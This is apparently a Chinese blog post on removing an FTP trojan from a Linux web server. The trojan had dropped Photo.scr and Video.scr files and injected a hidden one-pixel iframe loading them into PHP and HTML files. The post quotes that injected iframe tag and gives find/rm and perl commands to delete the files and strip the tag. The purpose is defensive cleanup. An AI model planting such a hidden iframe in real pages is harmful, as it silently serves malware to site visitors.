主机发现FTP木马Photo.scr、Video.scr 文件处理办法

主宰稳场 提交于 2020-01-09 12:25:22

突然发现Linux服务器上应用无法访问,报500错误,登录查看后发现磁盘被刷满了。

1、被挂马后服务器的情况

  1. 每个目录都是Photo.scr、Video.scr等文件;
  2. 每个程序文件中(.php,.html)文件都被加入恶意代码
    <iframe src=Photo.scr width=1 height=1 frameborder=0>

2、找了资料发现大家的解决方案分两步(如果是Windows系统自行百度):

  1. 删除木马文件,在网站代码目录执行删除命令(自行修改目录和文件名称):
    sudo find /data/web/ -type f -name "Video.scr" -print -exec rm -rf {} \;
  2. 删除每个程序文件中的恶意代码(根据自己应用的类型修改后缀名):
`find /data/web/ -name '*.php' | xargs perl -pi -e 's|<iframe src=Photo.scr width=1 height=1 frameborder=0></iframe>||g'`
`find /data/web/ -name '*.html' | xargs perl -pi -e 's|<iframe src=Photo.scr width=1 height=1 frameborder=0></iframe>||g'`

3、怎么防护?

怎么被上传的和防护方式请移步?

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!